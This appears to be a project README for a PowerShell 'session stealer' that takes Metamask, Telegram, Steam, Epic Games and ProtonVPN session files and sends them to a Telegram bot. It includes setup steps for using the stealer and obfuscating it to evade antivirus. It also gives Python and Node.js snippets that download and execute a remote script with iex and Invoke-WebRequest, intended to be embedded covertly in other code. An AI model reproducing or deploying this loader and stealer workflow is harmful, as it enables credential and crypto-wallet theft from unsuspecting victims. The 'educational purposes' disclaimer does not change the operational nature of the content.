Powershell Session Stealer
Telegram Channel
Report Bug
·
Request Feature
·
Send a Pull Request
Vare Session Stealer is a file stealer that aims to bypass Antiviruses during Runtime and Scantime using Powershell
┌──(Saint@root)-[~/]
└─$ cat VareSessionStealer
@Sessions
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
| Metamask Session File - From Opera, OperaGX, Chrome [Profile 1,2,3]
| Telegram Session File - From Base Path
| Steam Session File - From Base Path
| Epicgames Session File - From Base Path
| ProtonVPN Session File - From Base Path
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
- Download Project
- Change
$chatid
And$bottoken
With Yours - Obfuscate "PS1" File Using AES Encoder
- You're Done!
Upload the code you created and obfuscate to places that provide direct downloads such as discord and get the link (ex; discord.com/attchments/4455/file.ps1)
import subprocess
powershell_cmd = "iex (Invoke-WebRequest -Uri 'YOUR FILE URL' -UseBasicParsing).Content"
subprocess.run(["powershell", "-Command", powershell_cmd], capture_output=False, text=False)
Change "YOUR FILE URL" then add this to your code
const { exec } = require('child_process');
const powershellCmd = "iex (Invoke-WebRequest -Uri 'YOUR FILE URL' -UseBasicParsing).Content";
exec(`powershell -Command "${powershellCmd}"`, (error, stdout, stderr) => {});
Change "YOUR FILE URL" then add this to your code - i havent tested it but it will work 🤓
If you want to support me and my project, you can do the following, thank you
- Fork the Project
- Star the Project
- Open a Pull Request
- Anti Virustotal / AntiVM
- More Sessions (Gaming,Vpns,etc...)
- Anti Analysis
- New Obfuscation (Maybe 🤓)
I am not responsible for the damages caused by this code, everyone will use this code under their own responsibility, the code is shared for educational purposes. POC